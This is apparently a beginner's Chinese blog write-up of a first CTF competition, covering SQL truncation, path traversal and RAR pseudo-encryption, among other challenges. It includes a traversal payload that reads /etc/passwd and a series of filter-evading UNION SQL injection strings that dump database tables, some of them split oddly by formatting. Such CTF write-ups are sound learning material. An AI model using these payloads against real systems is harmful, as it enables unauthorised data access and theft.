整理一下第一次CTF(web+杂项)

第一次做题,知道差距在哪了,被打的落花流水,片甲不留,总之非常失败吧,只做题不整理的都是耍流氓,改变耍流氓。

后台管理系统

这道题考察的是sql约束攻击,在Bugku中遇到过,当时做的时候没想到,知识还是不够全面。
这个博客讲的比较详细,其中也有bugku中的题目
sql约束攻击总结
在这里插入图片描述跟bugku中的题目基本上一模一样,害,还是因为没整理,做过的都没印象,注册admin+空格(上边链接有原理),任意密码,然后用admin+密码登录就拿到了flag,很简单有木有,可是想不到就不知道。。。
在这里插入图片描述

阿童木爱好者小站

打开看到有16张图片,图片我就联想到了杂项,果然太菜,然后一个个保存,用binwalk分析,啥都没有,然后还用了stegsolve,毛都没有。。。然后我看了看源代码,题目突破口被我完美错过,看了一点感觉都没有,还是菜,害!
在这里插入图片描述题目突破口download.php?name= 这么明显的突破口竟然没感觉,还是刷题少。。但是就算我找到了突破口,我也做不出来,name传的值是我的盲区。盲区太多了
name传的值是/etc目录,之前完全没接触。。奇怪的知识+1。/etc目录详解
这一题就是获取用户数据库中的数据,flag就在数据库中。
构建payload:http://156eeea58ba695c8.yunyansec.com/download.php?name=/etc/passwd,下载数据库信息,打开发现最后的base64编码flag。
![在这里插入图片描述](https://img-blog.csdnimg.cn/20200426194945495.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0RvbmtleU1vb24=,size_16,color_FFFFFF,t_70解码得到

在这里插入图片描述

打假

这道题在做的时候就知道是rar的伪加密,但是之前没做过,不会解,搜了好多也没发现有用的信息,其实会做之后也挺简单。。还是还是知识储备不够!打开网页下载flag.rar,然后用winhex打开,修改一个数据就好了。
把第二行的第八个数据修改为80就解密了,但是师傅讲的时候是修改的84,但是弄了好久没弄好,最后还是问了小伙伴。奇怪的知识+2

在这里插入图片描述在这里插入图片描述

大学生活

在这里插入图片描述看url明显的sql注入,放到sqlmap里边没跑出来,然后我就手工注入,但是发现只有一个回显,我以为是盲注,手工盲注。。我就放弃了,但是他不是。。只是过滤了很多东西,构造的语句不对,过滤了空格,order…用//代替空格,也可以用()。
放上师傅的语句
?id=1/
/%26//1
?id=1/
/%26//0
?id=1/
/group//by//6
?id=-1//union//select//1,database(),3,4,5,6,7
?id=-2/
/union//select//1,group_concat(table_name),3,4,5,6,7//from//information_schema.tables//where//!(table_schema<>“web”)
?id=-2//union//select//1,group_concat(column_name),3,4,5,6,7//from//information_schema.columns//where//!(table_name<>“flag”)
?id=-2/
/union//select//1,flag,3,4,5,6,7//from//flag
得到flag
在这里插入图片描述

手绘

在这里插入图片描述打开就一张图片,这铁杂项了吧,用binwalk看一下,里边还有一张png图片,dd或者foremost提取一下,提取出来是两张一模一样的,两张图片考察盲水印。赛前培训有讲到,可是我没听。。遗憾。
用github上的脚本跑一下,但是python没有cv2模块,跑不出来,整了一下午也没搞好,搞好再试吧。

在这里插入图片描述

find the hacker

在这里插入图片描述打开好多登录信息,没有头绪,小伙伴说一个一个试,数据太多了,试了几个 ,找一下有什么不同的地方,前边都是404,我认为的是还没有被爆破,然后继续往下找,然后找到了302/304,在一堆302中试了一下,没用,我就想着肯定是在这临界的地方,然后往下找,在一堆200中发现了302,然后就去试了一下,就找到了
在这里插入图片描述还有一个ssti的题目,但是一直报错,也没找到flag,等以后慢慢摸索吧,另一个web题我感觉有点难,用到了php伪协议接触过,但是当初做题的时候没想到,通过php://filter读出三个文件,然后代码审计,用到了session,盲区。还是增长了不少知识。难题后边慢慢整理。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值